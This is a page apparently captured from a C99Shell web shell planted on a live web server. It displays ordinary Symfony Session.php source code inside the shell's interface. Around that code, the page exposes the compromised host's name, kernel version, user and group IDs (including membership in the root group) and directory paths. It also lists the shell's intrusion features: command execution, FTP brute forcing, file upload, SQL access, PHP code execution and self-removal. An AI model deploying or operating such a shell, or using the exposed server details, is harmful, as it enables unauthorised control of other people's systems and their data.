!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/smm.picotech.app/public_html/vendor/symfony/http-foundation/Session/   drwxr-xr-x
Free 28.55 GB of 117.98 GB (24.2%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     Session.php (6.14 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

/*
 * This file is part of the Symfony package.
 *
 * (c) Fabien Potencier <fabien@symfony.com>
 *
 * For the full copyright and license information, please view the LICENSE
 * file that was distributed with this source code.
 */

namespace Symfony\Component\HttpFoundation\Session;

use 
Symfony\Component\HttpFoundation\Session\Attribute\AttributeBag;
use 
Symfony\Component\HttpFoundation\Session\Attribute\AttributeBagInterface;
use 
Symfony\Component\HttpFoundation\Session\Flash\FlashBag;
use 
Symfony\Component\HttpFoundation\Session\Flash\FlashBagInterface;
use 
Symfony\Component\HttpFoundation\Session\Storage\NativeSessionStorage;
use 
Symfony\Component\HttpFoundation\Session\Storage\SessionStorageInterface;

// Help opcache.preload discover always-needed symbols
class_exists(AttributeBag::class);
class_exists(FlashBag::class);
class_exists(SessionBagProxy::class);

/**
 * @author Fabien Potencier <fabien@symfony.com>
 * @author Drak <drak@zikula.org>
 *
 * @implements \IteratorAggregate<string, mixed>
 */
class Session implements SessionInterface\IteratorAggregate\Countable
{
    protected 
$storage;

    private 
$flashName;
    private 
$attributeName;
    private 
$data = [];
    private 
$usageIndex 0;
    private 
$usageReporter;

    public function 
__construct(SessionStorageInterface $storage nullAttributeBagInterface $attributes nullFlashBagInterface $flashes null, callable $usageReporter null)
    {
        
$this->storage $storage ?? new NativeSessionStorage();
        
$this->usageReporter $usageReporter;

        
$attributes $attributes ?? new AttributeBag();
        
$this->attributeName $attributes->getName();
        
$this->registerBag($attributes);

        
$flashes $flashes ?? new FlashBag();
        
$this->flashName $flashes->getName();
        
$this->registerBag($flashes);
    }

    
/**
     * {@inheritdoc}
     */
    
public function start()
    {
        return 
$this->storage->start();
    }

    
/**
     * {@inheritdoc}
     */
    
public function has(string $name)
    {
        return 
$this->getAttributeBag()->has($name);
    }

    
/**
     * {@inheritdoc}
     */
    
public function get(string $name$default null)
    {
        return 
$this->getAttributeBag()->get($name$default);
    }

    
/**
     * {@inheritdoc}
     */
    
public function set(string $name$value)
    {
        
$this->getAttributeBag()->set($name$value);
    }

    
/**
     * {@inheritdoc}
     */
    
public function all()
    {
        return 
$this->getAttributeBag()->all();
    }

    
/**
     * {@inheritdoc}
     */
    
public function replace(array $attributes)
    {
        
$this->getAttributeBag()->replace($attributes);
    }

    
/**
     * {@inheritdoc}
     */
    
public function remove(string $name)
    {
        return 
$this->getAttributeBag()->remove($name);
    }

    
/**
     * {@inheritdoc}
     */
    
public function clear()
    {
        
$this->getAttributeBag()->clear();
    }

    
/**
     * {@inheritdoc}
     */
    
public function isStarted()
    {
        return 
$this->storage->isStarted();
    }

    
/**
     * Returns an iterator for attributes.
     *
     * @return \ArrayIterator<string, mixed>
     */
    
#[\ReturnTypeWillChange]
    public function 
getIterator()
    {
        return new 
\ArrayIterator($this->getAttributeBag()->all());
    }

    
/**
     * Returns the number of attributes.
     *
     * @return int
     */
    
#[\ReturnTypeWillChange]
    public function 
count()
    {
        return 
\count($this->getAttributeBag()->all());
    }

    public function &
getUsageIndex(): int
    
{
        return 
$this->usageIndex;
    }

    
/**
     * @internal
     */
    
public function isEmpty(): bool
    
{
        if (
$this->isStarted()) {
            ++
$this->usageIndex;
            if (
$this->usageReporter && <= $this->usageIndex) {
                (
$this->usageReporter)();
            }
        }
        foreach (
$this->data as &$data) {
            if (!empty(
$data)) {
                return 
false;
            }
        }

        return 
true;
    }

    
/**
     * {@inheritdoc}
     */
    
public function invalidate(int $lifetime null)
    {
        
$this->storage->clear();

        return 
$this->migrate(true$lifetime);
    }

    
/**
     * {@inheritdoc}
     */
    
public function migrate(bool $destroy falseint $lifetime null)
    {
        return 
$this->storage->regenerate($destroy$lifetime);
    }

    
/**
     * {@inheritdoc}
     */
    
public function save()
    {
        
$this->storage->save();
    }

    
/**
     * {@inheritdoc}
     */
    
public function getId()
    {
        return 
$this->storage->getId();
    }

    
/**
     * {@inheritdoc}
     */
    
public function setId(string $id)
    {
        if (
$this->storage->getId() !== $id) {
            
$this->storage->setId($id);
        }
    }

    
/**
     * {@inheritdoc}
     */
    
public function getName()
    {
        return 
$this->storage->getName();
    }

    
/**
     * {@inheritdoc}
     */
    
public function setName(string $name)
    {
        
$this->storage->setName($name);
    }

    
/**
     * {@inheritdoc}
     */
    
public function getMetadataBag()
    {
        ++
$this->usageIndex;
        if (
$this->usageReporter && <= $this->usageIndex) {
            (
$this->usageReporter)();
        }

        return 
$this->storage->getMetadataBag();
    }

    
/**
     * {@inheritdoc}
     */
    
public function registerBag(SessionBagInterface $bag)
    {
        
$this->storage->registerBag(new SessionBagProxy($bag$this->data$this->usageIndex$this->usageReporter));
    }

    
/**
     * {@inheritdoc}
     */
    
public function getBag(string $name)
    {
        
$bag $this->storage->getBag($name);

        return 
method_exists($bag'getBag') ? $bag->getBag() : $bag;
    }

    
/**
     * Gets the flashbag interface.
     *
     * @return FlashBagInterface
     */
    
public function getFlashBag()
    {
        return 
$this->getBag($this->flashName);
    }

    
/**
     * Gets the attributebag interface.
     *
     * Note that this method was added to help with IDE autocompletion.
     */
    
private function getAttributeBag(): AttributeBagInterface
    
{
        return 
$this->getBag($this->attributeName);
    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0043 ]--